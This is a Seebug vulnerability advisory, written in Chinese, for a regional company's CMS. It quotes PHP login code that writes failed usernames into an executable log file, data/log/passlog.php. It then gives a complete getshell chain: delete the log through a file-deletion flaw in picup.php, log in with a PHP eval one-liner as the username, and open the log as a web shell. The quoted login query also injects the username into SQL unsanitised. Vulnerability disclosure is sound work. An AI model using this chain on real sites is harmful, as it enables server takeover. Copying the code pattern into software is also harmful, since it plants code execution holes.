台州市极速网络CMS /data/log/passlog.php 任意代码执行漏洞

2015-09-28T00:00:00
ID SSV:89565
Type seebug
Reporter
Modified 2015-09-28T00:00:00

Description

<p>先看根目录当中的login.php</p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);"><?<br style="margin: 0px; padding: 0px;"> $IS_LOGIN = true;<br style="margin: 0px; padding: 0px;"> require "./includes/headinc.php";<br style="margin: 0px; padding: 0px;"> register_shutdown_function('union_end');<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> if($action == 'logout') {<br style="margin: 0px; padding: 0px;"> $union_user = $union_pass = $gid = '';<br style="margin: 0px; padding: 0px;"> //clearcookies();<br style="margin: 0px; padding: 0px;"> //$sess_arr = array();<br style="margin: 0px; padding: 0px;"> $SESSION[sess_arr] = $sess_arr = '';<br style="margin: 0px; padding: 0px;"> session_unregister('sess_arr');<br style="margin: 0px; padding: 0px;"> echo "<meta http-equiv=\"refresh\" content=\"0;url=admin.php\">"; <br style="margin: 0px; padding: 0px;"> //header("Location:login.php");<br style="margin: 0px; padding: 0px;"> exit;<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> if($action == 'login') {<br style="margin: 0px; padding: 0px;"> $validate_t = crypt($validate, 'ckskya576');<br style="margin: 0px; padding: 0px;"> if($_SESSION[md5vali] != $validate_t)<br style="margin: 0px; padding: 0px;"> //showmessage("验证码检验失败,请返回");<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> $UNION_USER = '';<br style="margin: 0px; padding: 0px;"> $loginpass2 = md5($loginpass);<br style="margin: 0px; padding: 0px;"> $UNION_USER = $db->fetchSingle("SELECT uid AS union_uid, fig AS union_fig, username AS union_user, password AS union_pass FROM table_members WHERE username='$loginuser' && password='$loginpass2'");<br style="margin: 0px; padding: 0px;"> if($UNION_USER[union_uid] && !$UNION_USER[union_fig])<br style="margin: 0px; padding: 0px;"> showmessage('此帐号不可用');<br style="margin: 0px; padding: 0px;"> if ($UNION_USER) {<br style="margin: 0px; padding: 0px;"> //$qs_ts = $db->query_fetch("select * from table_sessions where username='$UNION_USER[union_user]' && ip!='$yip'");<br style="margin: 0px; padding: 0px;"> //if($qs_ts[username])<br style="margin: 0px; padding: 0px;"> // showmessage('对不起, 同一帐号不能同时在多台电脑上登录');<br style="margin: 0px; padding: 0px;"> //echo "delete from table_sessions where ip='$yip' && sesskey!='".session_id()."'";exit;<br style="margin: 0px; padding: 0px;"> //$db->query("delete from table_sessions where ip='$yip' && sesskey!='".session_id()."'");<br style="margin: 0px; padding: 0px;"> #$db->queryDb("update table_members set loginnum=loginnum+1,lastlogin='".time()."' where uid=$UNION_USER[union_uid]",1);<br style="margin: 0px; padding: 0px;"> //union_setcookie("union_user", $UNION_USER['union_user']);<br style="margin: 0px; padding: 0px;"> //union_setcookie("union_pass_", $UNION_USER['union_pass']);<br style="margin: 0px; padding: 0px;"> }else{<br style="margin: 0px; padding: 0px;"> $errorlog = "$loginuser\t".substr($loginpass, 0, 2);<br style="margin: 0px; padding: 0px;"> for($i = 3; $i < strlen($loginpass); $i++) {<br style="margin: 0px; padding: 0px;"> $errorlog .= "";<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> $errorlog .= substr($loginpass, -1)."\t$yip\t$timestamp\n";<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> @$fp = fopen("./data/log/passlog.php", "a");<br style="margin: 0px; padding: 0px;"> @flock($fp, 3);<br style="margin: 0px; padding: 0px;"> @fwrite($fp, $errorlog);<br style="margin: 0px; padding: 0px;"> @fclose($fp);<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> //clearcookies();<br style="margin: 0px; padding: 0px;"> }</code></pre><p><br><br><br><br>其中的</p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">$errorlog = "$loginuser\t".substr($loginpass, 0, 2);<br style="margin: 0px; padding: 0px;"> for($i = 3; $i < strlen($loginpass); $i++) {<br style="margin: 0px; padding: 0px;"> $errorlog .= "";<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> $errorlog .= substr($loginpass, -1)."\t$yip\t$timestamp\n";<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> @$fp = fopen("./data/log/passlog.php", "a");<br style="margin: 0px; padding: 0px;"> @flock($fp, 3);<br style="margin: 0px; padding: 0px;"> @fwrite($fp, $errorlog);<br style="margin: 0px; padding: 0px;"> @fclose($fp);</code></pre><p><br><br>其中登录失败就直接将错误的用户名和过滤的密码写到data/log/passlog.php当中了。。。<br><br>你想想,这是不是任意代码写入呢??<br><br>这是赤裸裸让你写恶意代码进去啊? 是不是可以直接写一句话呢? 当然是可以的<br><br>例如你用户名处填<?php phpinfo();?> 密码随便输 到时候你访问下data/log/passlog.php就知道是否执行了。<br><br>不过一般很多有错误登录的记录,所以这个文件有错误,导致不能马上执行,但是你想到过我前一蛋么????<br><br><br><br>直接任意文件删除<br><br><br><br>getshell步骤如下(千万别做坏事,后果自负)<br><br><br><br>1、先访问如:http://XXX.COM/picup.php?action=del&pic=../data/log/passlog.php<br><br>2、然后访问 http://XXX.COM/login.php<br><br>用户名填:<?php phpinfo();eval($_POST[XXX]);?><br><br>密码:3333333<br><br>3、访问: <a href="http://XXX.COM/data/log/passlog.php" rel="nofollow">http://XXX.COM/data/log/passlog.php</a> 即为shell 密码就是XXX<br><br><br></p>